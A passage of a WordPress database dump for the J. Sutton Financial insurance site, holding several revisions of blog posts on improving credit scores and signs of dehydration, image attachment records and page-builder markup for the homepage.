target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','4 Tips To Improve Your Credit Score','','inherit','closed','closed','','457-revision-v1','','','2023-03-21 14:46:17','2023-03-21 14:46:17','',457,'http://cmdev-site1.com/?p=458',0,'revision','',0),(459,3,'2023-03-21 14:47:25','2023-03-21 14:47:25','<span style=\"font-size: 8pt;\">By Lucille Reed\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n<h3>4 Tips To Improve Your Credit Score</h3>\r\nYou’ve heard of credit scores, but do you know yours? Your credit score is a predictor that helps financial institutions determine how likely it is that you’ll repay the money lent to you.\r\n\r\nMany people don’t realize that knowing your credit score is as important as knowing your bank balance. Even many insurance companies consider your score when determining your insurance premium.\r\n\r\nLuckily, keeping tabs on your score is easier than you think.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>1. Request a Free Credit Report</h3>\r\nPaying attention and knowing what your credit looks like is key. You can request a free credit report once a year at <a href=\"https://www.annualcreditreport.com/\" target=\"_blank\" rel=\"noopener noreferrer\">www.annualcreditreport.com</a> or at your local bank or credit union.\r\n\r\nReview the report for any mistakes or accounts that are incorrect. It isn’t unusual to find mistakes, and many people miss this opportunity to help increase their scores by removing erroneous information.\r\n\r\nOnce you see all of your debts, then you can begin to make some changes.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>2. Reduce Your Debt</h3>\r\nAfter reviewing your free credit report, identify the smallest debts and pay those down first. Even if you can only budget an additional $10 towards each bill payment, the effort is what matters here.\r\n\r\nIf you have big credit card balances, call your credit card companies to ask for your limit to be raised. The point isn’t to charge more, but instead, to increase your debt ratio, which is basically the difference between what you owe and what you’ve been allowed to borrow.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>3. Set Payment Reminders</h3>\r\nMissing payments and making late payments are quick ways to lower your score. Set payment reminders or auto-deduct when and where you can so you can avoid the possibility of late payments.\r\n\r\nIf you plan to always pay the minimum payment on a credit card, visit their site to set up recurring payments. If you find yourself rushing to the bank to make a loan payment on or after the due date, inquire about setting up auto-deductions.\r\n\r\nYou can often choose the day the funds will be drafted out of your account. Many people choose the day after payday to ensure funds are available.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>4. Open A Credit Card</h3>\r\nOnce a free credit report is requested and reviewed, many people find that their issue isn’t bad credit, but actually a lack of credit history.\r\n\r\nIn this instance, it may be a good idea to visit your local bank or credit union and inquire about opening a line of credit for the purpose of improving your credit history.\r\n\r\nThe key is to use it for small purchases and then pay it back each month just to keep the account open and the balance low. In 6-8 months, ask for a new credit report and see the difference.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','4 Tips To Improve Your Credit Score','','inherit','closed','closed','','457-revision-v1','','','2023-03-21 14:47:25','2023-03-21 14:47:25','',457,'http://cmdev-site1.com/?p=459',0,'revision','',0),(460,3,'2023-03-21 14:48:15','2023-03-21 14:48:15','<span style=\"font-size: 8pt;\">By Lucille Reed\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n<h3>4 Tips To Improve Your Credit Score</h3>\r\nYou’ve heard of credit scores, but do you know yours? Your credit score is a predictor that helps financial institutions determine how likely it is that you’ll repay the money lent to you.\r\n\r\nMany people don’t realize that knowing your credit score is as important as knowing your bank balance. Even many insurance companies consider your score when determining your insurance premium.\r\n\r\nLuckily, keeping tabs on your score is easier than you think.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>1. Request a Free Credit Report</h3>\r\nPaying attention and knowing what your credit looks like is key. You can request a free credit report once a year at <a href=\"https://www.annualcreditreport.com/\" target=\"_blank\" rel=\"noopener noreferrer\">www.annualcreditreport.com</a> or at your local bank or credit union.\r\n\r\nReview the report for any mistakes or accounts that are incorrect. It isn’t unusual to find mistakes, and many people miss this opportunity to help increase their scores by removing erroneous information.\r\n\r\nOnce you see all of your debts, then you can begin to make some changes.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>2. Reduce Your Debt</h3>\r\nAfter reviewing your free credit report, identify the smallest debts and pay those down first. Even if you can only budget an additional $10 towards each bill payment, the effort is what matters here.\r\n\r\nIf you have big credit card balances, call your credit card companies to ask for your limit to be raised. The point isn’t to charge more, but instead, to increase your debt ratio, which is basically the difference between what you owe and what you’ve been allowed to borrow.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>3. Set Payment Reminders</h3>\r\nMissing payments and making late payments are quick ways to lower your score. Set payment reminders or auto-deduct when and where you can so you can avoid the possibility of late payments.\r\n\r\nIf you plan to always pay the minimum payment on a credit card, visit their site to set up recurring payments. If you find yourself rushing to the bank to make a loan payment on or after the due date, inquire about setting up auto-deductions.\r\n\r\nYou can often choose the day the funds will be drafted out of your account. Many people choose the day after payday to ensure funds are available.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>4. Open A Credit Card</h3>\r\nOnce a free credit report is requested and reviewed, many people find that their issue isn’t bad credit, but actually a lack of credit history.\r\n\r\nIn this instance, it may be a good idea to visit your local bank or credit union and inquire about opening a line of credit for the purpose of improving your credit history.\r\n\r\nThe key is to use it for small purchases and then pay it back each month just to keep the account open and the balance low. In 6-8 months, ask for a new credit report and see the difference.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find more information about your life insurance options.','4 Tips To Improve Your Credit Score','','inherit','closed','closed','','457-revision-v1','','','2023-03-21 14:48:15','2023-03-21 14:48:15','',457,'http://cmdev-site1.com/?p=460',0,'revision','',0),(461,3,'2023-03-21 14:58:19','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Stacy Williams\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n\r\nWater makes up sixty percent of your body weight. Although there is recent scientific evidence showing that people may not necessarily need the eight glasses of water a day, there are still numerous health reasons to continue drinking plenty of water.\r\n\r\nThe following are signs you may not be getting enough water every day:\r\n<ol>\r\n 	<li><strong>Dry Mouth – </strong>Most people have experienced a dry mouth feeling, but before you reach for that soda to quench your thirst, know that sugary drinks will only be a temporary fix and you will soon feel thirsty once again. It is important to drink water in order to keep the mucus membranes in your mouth and throat lubricated and enable saliva to be produced. Saliva is needed for multiple reasons like neutralizing acids, protecting the mouth against ulcers and sores, and assisting with eating and speaking.\r\n<span style=\"color: #ffffff;\">-</span>\r\nDry mouth is also a very common problem in the elderly, due to prescription medicines. If you are experiencing dry mouth with medication, be sure to advise your physician. There may be an alternate medication you can take or your doctor may be able to adjust your medication.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Alligator Skin – </strong>Dry skin can be another sign of dehydration, which can be caused by a lack of water and an excess intake of alcoholic beverages. Alcohol dehydrates the entire body. It not only can cause dry mouth but also dry, flaky skin. Drinking plenty of water can also help with preventing breakouts. Even if you are experiencing oily skin, you can still be dehydrated, because dehydration is a sign of lack of water that your body has, not the lack of oil it produces.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Dry Eyes – </strong>Being dehydrated can also have an effect on your eyes. It can cause the tear ducts in your eyes to dry up, as well as cause your eyes to appear bloodshot. If you wear contacts, dry eyes can certainly be a miserable feeling. It’s an important reason to drink plenty of water.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Joint Pain – </strong>Water is essential in providing a cushion between joints and keeping your bones from grinding against each other. In fact, the cartilage and spinal discs within your body are made up of about 80% water. It’s important to stay hydrated for bone and joint health.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Loss Of Muscle Mass – </strong>Because the muscles in your body are made up of mostly water, it is important you stay hydrated to prevent losing muscle mass. In addition, you should always drink plenty of water before, during, and after exercise or physical activity. This will prevent muscle cramps, inflammation, and soreness. It can also give you greater endurance as you work out.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Toxicity – </strong>Drinking plenty of water helps rid your body of toxins. As the organs in your body work to filter out toxins, they need to stay hydrated in order to work properly. If your body begins to be dehydrated, your organs will start to pull water from stored areas in your body, such as your blood. This can lead to health problems since your body is not able to sufficiently flush toxins from your body.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Lack Of Stamina – </strong>When you are dehydrated, you tend to feel fatigued and lethargic. This is because your body will take water from where it can find it. Without the proper fluids flowing through the bloodstream, the body is not able to carry oxygen to your brain. This can lead to fatigue and a lack of energy. You must hydrate with plenty of water in order to feel healthy and energetic.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Hunger – </strong>If you wake up feeling like you need a midnight snack, it may be because you are actually dehydrated. Drinking water will help put the body through a cleansing process as it purifies the system. However, if you choose to satisfy your overnight cravings with food instead, you actually make your body work harder by trying to digest the food while you sleep.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Constipation – </strong>Not only do you need to get an adequate amount of fiber in your diet and plenty of exercise to prevent constipation, water is essential to help with digestion and moving food through the intestines. When you become dehydrated, you can experience constipation, which can lead to many other problems.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Premature Aging – </strong>One of the best anti-aging secrets you will find is drinking water. Staying hydrated and drinking plenty of water helps prevent your skin from becoming dry, tight, and flaky. It also keeps your skin supple, resilient, and less prone to wrinkling. Additionally, not only can staying hydrated significantly stave off signs of aging on the outside, but it can also prevent internal aging as well.</li>\r\n</ol>\r\nSo how much water should you be drinking?\r\n\r\nThe Institute of Medicine’s Food and Nutrition Board recommends that women need 91 ounces daily of water from foods and drinks, and men should consume 125 ounces.\r\n\r\nInstead of grabbing a soda, grab a bottle of water so you can look and feel healthier.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','10 Signs You May Not Be Drinking Enough Water','','draft','open','open','','','','','2023-03-21 14:58:19','2023-03-21 14:58:19','',0,'http://cmdev-site1.com/?p=461',0,'post','',0),(462,3,'2023-03-21 14:53:12','2023-03-21 14:53:12','<span style=\"font-size: 8pt;\">By Stacy Williams\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n\r\nWater makes up sixty percent of your body weight. Although there is recent scientific evidence showing that people may not necessarily need the eight glasses of water a day, there are still numerous health reasons to continue drinking plenty of water.\r\n\r\nThe following are signs you may not be getting enough water every day:\r\n<ol>\r\n 	<li><strong>Dry Mouth – </strong>Most people have experienced a dry mouth feeling, but before you reach for that soda to quench your thirst, know that sugary drinks will only be a temporary fix and you will soon feel thirsty once again. It is important to drink water in order to keep the mucus membranes in your mouth and throat lubricated and enable saliva to be produced. Saliva is needed for multiple reasons like neutralizing acids, protecting the mouth against ulcers and sores, and assisting with eating and speaking.\r\n\r\nDry mouth is also a very common problem in the elderly, due to prescription medicines. If you are experiencing dry mouth with medication, be sure to advise your physician. There may be an alternate medication you can take or your doctor may be able to adjust your medication.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Alligator Skin – </strong>Dry skin can be another sign of dehydration, which can be caused by a lack of water and an excess intake of alcoholic beverages. Alcohol dehydrates the entire body. It not only can cause dry mouth but also dry, flaky skin. Drinking plenty of water can also help with preventing breakouts. Even if you are experiencing oily skin, you can still be dehydrated, because dehydration is a sign of lack of water that your body has, not the lack of oil it produces.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Dry Eyes – </strong>Being dehydrated can also have an effect on your eyes. It can cause the tear ducts in your eyes to dry up, as well as cause your eyes to appear bloodshot. If you wear contacts, dry eyes can certainly be a miserable feeling. It’s an important reason to drink plenty of water.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Joint Pain – </strong>Water is essential in providing a cushion between joints and keeping your bones from grinding against each other. In fact, the cartilage and spinal discs within your body are made up of about 80% water. It’s important to stay hydrated for bone and joint health.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Loss Of Muscle Mass – </strong>Because the muscles in your body are made up of mostly water, it is important you stay hydrated to prevent losing muscle mass. In addition, you should always drink plenty of water before, during, and after exercise or physical activity. This will prevent muscle cramps, inflammation, and soreness. It can also give you greater endurance as you work out.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Toxicity – </strong>Drinking plenty of water helps rid your body of toxins. As the organs in your body work to filter out toxins, they need to stay hydrated in order to work properly. If your body begins to be dehydrated, your organs will start to pull water from stored areas in your body, such as your blood. This can lead to health problems since your body is not able to sufficiently flush toxins from your body.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Lack Of Stamina – </strong>When you are dehydrated, you tend to feel fatigued and lethargic. This is because your body will take water from where it can find it. Without the proper fluids flowing through the bloodstream, the body is not able to carry oxygen to your brain. This can lead to fatigue and a lack of energy. You must hydrate with plenty of water in order to feel healthy and energetic.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Hunger – </strong>If you wake up feeling like you need a midnight snack, it may be because you are actually dehydrated. Drinking water will help put the body through a cleansing process as it purifies the system. However, if you choose to satisfy your overnight cravings with food instead, you actually make your body work harder by trying to digest the food while you sleep.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Constipation – </strong>Not only do you need to get an adequate amount of fiber in your diet and plenty of exercise to prevent constipation, water is essential to help with digestion and moving food through the intestines. When you become dehydrated, you can experience constipation, which can lead to many other problems.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Premature Aging – </strong>One of the best anti-aging secrets you will find is drinking water. Staying hydrated and drinking plenty of water helps prevent your skin from becoming dry, tight, and flaky. It also keeps your skin supple, resilient, and less prone to wrinkling. Additionally, not only can staying hydrated significantly stave off signs of aging on the outside, but it can also prevent internal aging as well.</li>\r\n</ol>\r\nSo how much water should you be drinking?\r\n\r\nThe Institute of Medicine’s Food and Nutrition Board recommends that women need 91 ounces daily of water from foods and drinks, and men should consume 125 ounces. Instead of grabbing a soda, grab a bottle of water so you can look and feel healthier.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','10 Signs You May Not Be Drinking Enough Water','','inherit','closed','closed','','461-revision-v1','','','2023-03-21 14:53:12','2023-03-21 14:53:12','',461,'http://cmdev-site1.com/?p=462',0,'revision','',0),(463,3,'2023-03-21 14:53:37','2023-03-21 14:53:37','<span style=\"font-size: 8pt;\">By Stacy Williams\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n\r\nWater makes up sixty percent of your body weight. Although there is recent scientific evidence showing that people may not necessarily need the eight glasses of water a day, there are still numerous health reasons to continue drinking plenty of water.\r\n\r\nThe following are signs you may not be getting enough water every day:\r\n<ol>\r\n 	<li><strong>Dry Mouth – </strong>Most people have experienced a dry mouth feeling, but before you reach for that soda to quench your thirst, know that sugary drinks will only be a temporary fix and you will soon feel thirsty once again. It is important to drink water in order to keep the mucus membranes in your mouth and throat lubricated and enable saliva to be produced. Saliva is needed for multiple reasons like neutralizing acids, protecting the mouth against ulcers and sores, and assisting with eating and speaking.\r\n<span style=\"color: #ffffff;\">-</span>\r\nDry mouth is also a very common problem in the elderly, due to prescription medicines. If you are experiencing dry mouth with medication, be sure to advise your physician. There may be an alternate medication you can take or your doctor may be able to adjust your medication.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Alligator Skin – </strong>Dry skin can be another sign of dehydration, which can be caused by a lack of water and an excess intake of alcoholic beverages. Alcohol dehydrates the entire body. It not only can cause dry mouth but also dry, flaky skin. Drinking plenty of water can also help with preventing breakouts. Even if you are experiencing oily skin, you can still be dehydrated, because dehydration is a sign of lack of water that your body has, not the lack of oil it produces.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Dry Eyes – </strong>Being dehydrated can also have an effect on your eyes. It can cause the tear ducts in your eyes to dry up, as well as cause your eyes to appear bloodshot. If you wear contacts, dry eyes can certainly be a miserable feeling. It’s an important reason to drink plenty of water.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Joint Pain – </strong>Water is essential in providing a cushion between joints and keeping your bones from grinding against each other. In fact, the cartilage and spinal discs within your body are made up of about 80% water. It’s important to stay hydrated for bone and joint health.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Loss Of Muscle Mass – </strong>Because the muscles in your body are made up of mostly water, it is important you stay hydrated to prevent losing muscle mass. In addition, you should always drink plenty of water before, during, and after exercise or physical activity. This will prevent muscle cramps, inflammation, and soreness. It can also give you greater endurance as you work out.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Toxicity – </strong>Drinking plenty of water helps rid your body of toxins. As the organs in your body work to filter out toxins, they need to stay hydrated in order to work properly. If your body begins to be dehydrated, your organs will start to pull water from stored areas in your body, such as your blood. This can lead to health problems since your body is not able to sufficiently flush toxins from your body.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Lack Of Stamina – </strong>When you are dehydrated, you tend to feel fatigued and lethargic. This is because your body will take water from where it can find it. Without the proper fluids flowing through the bloodstream, the body is not able to carry oxygen to your brain. This can lead to fatigue and a lack of energy. You must hydrate with plenty of water in order to feel healthy and energetic.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Hunger – </strong>If you wake up feeling like you need a midnight snack, it may be because you are actually dehydrated. Drinking water will help put the body through a cleansing process as it purifies the system. However, if you choose to satisfy your overnight cravings with food instead, you actually make your body work harder by trying to digest the food while you sleep.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Constipation – </strong>Not only do you need to get an adequate amount of fiber in your diet and plenty of exercise to prevent constipation, water is essential to help with digestion and moving food through the intestines. When you become dehydrated, you can experience constipation, which can lead to many other problems.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Premature Aging – </strong>One of the best anti-aging secrets you will find is drinking water. Staying hydrated and drinking plenty of water helps prevent your skin from becoming dry, tight, and flaky. It also keeps your skin supple, resilient, and less prone to wrinkling. Additionally, not only can staying hydrated significantly stave off signs of aging on the outside, but it can also prevent internal aging as well.</li>\r\n</ol>\r\nSo how much water should you be drinking?\r\n\r\nThe Institute of Medicine’s Food and Nutrition Board recommends that women need 91 ounces daily of water from foods and drinks, and men should consume 125 ounces. Instead of grabbing a soda, grab a bottle of water so you can look and feel healthier.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','10 Signs You May Not Be Drinking Enough Water','','inherit','closed','closed','','461-revision-v1','','','2023-03-21 14:53:37','2023-03-21 14:53:37','',461,'http://cmdev-site1.com/?p=463',0,'revision','',0),(464,3,'2023-03-21 14:57:35','2023-03-21 14:57:35','Water before breakfast. Slim and fit woman with many little braids drinking water before having breakfast','Slim and fit woman drinking water before having breakfast','','inherit','open','closed','','slim-and-fit-woman-drinking-water-before-having-breakfast','','','2023-03-21 14:57:47','2023-03-21 14:57:47','',461,'http://cmdev-site1.com/wp-content/uploads/2023/03/Slim-and-fit-woman-drinking-water-before-having-breakfast-1000x667-1.jpg',0,'attachment','image/jpeg',0),(465,3,'2023-03-21 14:58:19','2023-03-21 14:58:19','<span style=\"font-size: 8pt;\">By Stacy Williams\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n\r\nWater makes up sixty percent of your body weight. Although there is recent scientific evidence showing that people may not necessarily need the eight glasses of water a day, there are still numerous health reasons to continue drinking plenty of water.\r\n\r\nThe following are signs you may not be getting enough water every day:\r\n<ol>\r\n 	<li><strong>Dry Mouth – </strong>Most people have experienced a dry mouth feeling, but before you reach for that soda to quench your thirst, know that sugary drinks will only be a temporary fix and you will soon feel thirsty once again. It is important to drink water in order to keep the mucus membranes in your mouth and throat lubricated and enable saliva to be produced. Saliva is needed for multiple reasons like neutralizing acids, protecting the mouth against ulcers and sores, and assisting with eating and speaking.\r\n<span style=\"color: #ffffff;\">-</span>\r\nDry mouth is also a very common problem in the elderly, due to prescription medicines. If you are experiencing dry mouth with medication, be sure to advise your physician. There may be an alternate medication you can take or your doctor may be able to adjust your medication.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Alligator Skin – </strong>Dry skin can be another sign of dehydration, which can be caused by a lack of water and an excess intake of alcoholic beverages. Alcohol dehydrates the entire body. It not only can cause dry mouth but also dry, flaky skin. Drinking plenty of water can also help with preventing breakouts. Even if you are experiencing oily skin, you can still be dehydrated, because dehydration is a sign of lack of water that your body has, not the lack of oil it produces.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Dry Eyes – </strong>Being dehydrated can also have an effect on your eyes. It can cause the tear ducts in your eyes to dry up, as well as cause your eyes to appear bloodshot. If you wear contacts, dry eyes can certainly be a miserable feeling. It’s an important reason to drink plenty of water.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Joint Pain – </strong>Water is essential in providing a cushion between joints and keeping your bones from grinding against each other. In fact, the cartilage and spinal discs within your body are made up of about 80% water. It’s important to stay hydrated for bone and joint health.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Loss Of Muscle Mass – </strong>Because the muscles in your body are made up of mostly water, it is important you stay hydrated to prevent losing muscle mass. In addition, you should always drink plenty of water before, during, and after exercise or physical activity. This will prevent muscle cramps, inflammation, and soreness. It can also give you greater endurance as you work out.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Toxicity – </strong>Drinking plenty of water helps rid your body of toxins. As the organs in your body work to filter out toxins, they need to stay hydrated in order to work properly. If your body begins to be dehydrated, your organs will start to pull water from stored areas in your body, such as your blood. This can lead to health problems since your body is not able to sufficiently flush toxins from your body.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Lack Of Stamina – </strong>When you are dehydrated, you tend to feel fatigued and lethargic. This is because your body will take water from where it can find it. Without the proper fluids flowing through the bloodstream, the body is not able to carry oxygen to your brain. This can lead to fatigue and a lack of energy. You must hydrate with plenty of water in order to feel healthy and energetic.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Hunger – </strong>If you wake up feeling like you need a midnight snack, it may be because you are actually dehydrated. Drinking water will help put the body through a cleansing process as it purifies the system. However, if you choose to satisfy your overnight cravings with food instead, you actually make your body work harder by trying to digest the food while you sleep.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Constipation – </strong>Not only do you need to get an adequate amount of fiber in your diet and plenty of exercise to prevent constipation, water is essential to help with digestion and moving food through the intestines. When you become dehydrated, you can experience constipation, which can lead to many other problems.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li><strong>Premature Aging – </strong>One of the best anti-aging secrets you will find is drinking water. Staying hydrated and drinking plenty of water helps prevent your skin from becoming dry, tight, and flaky. It also keeps your skin supple, resilient, and less prone to wrinkling. Additionally, not only can staying hydrated significantly stave off signs of aging on the outside, but it can also prevent internal aging as well.</li>\r\n</ol>\r\nSo how much water should you be drinking?\r\n\r\nThe Institute of Medicine’s Food and Nutrition Board recommends that women need 91 ounces daily of water from foods and drinks, and men should consume 125 ounces.\r\n\r\nInstead of grabbing a soda, grab a bottle of water so you can look and feel healthier.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','10 Signs You May Not Be Drinking Enough Water','','inherit','closed','closed','','461-revision-v1','','','2023-03-21 14:58:19','2023-03-21 14:58:19','',461,'http://cmdev-site1.com/?p=465',0,'revision','',0),(467,3,'2023-03-22 13:06:36','2023-03-22 13:06:36','','Downtown Houston skyline','Downtown Houston skyline in Texas USA at twilight','inherit','open','closed','','downtown-houston-skyline','','','2023-03-22 13:06:36','2023-03-22 13:06:36','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500.jpg',0,'attachment','image/jpeg',0),(550,3,'2023-03-31 11:58:20','2023-03-31 11:58:20','','j sutton logo white no background','','inherit','open','closed','','j-sutton-logo-white-no-background','','','2023-03-31 11:58:20','2023-03-31 11:58:20','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png',0,'attachment','image/png',0),(486,3,'2023-03-24 15:32:26','2023-03-24 15:32:26','{\n    \"site_icon\": {\n        \"value\": 196,\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2023-03-24 15:32:26\"\n    }\n}','','','trash','closed','closed','','f0f384b9-4e9d-4aad-9645-b01377c6d613','','','2023-03-24 15:32:26','2023-03-24 15:32:26','',0,'http://cmdev-site1.com/2023/03/24/f0f384b9-4e9d-4aad-9645-b01377c6d613/',0,'customize_changeset','',0),(491,1,'2023-03-26 18:37:26','2023-03-26 18:37:26','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||376px|||\" global_colors_info=\"{}\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_fullwidth_menu][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_button _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image 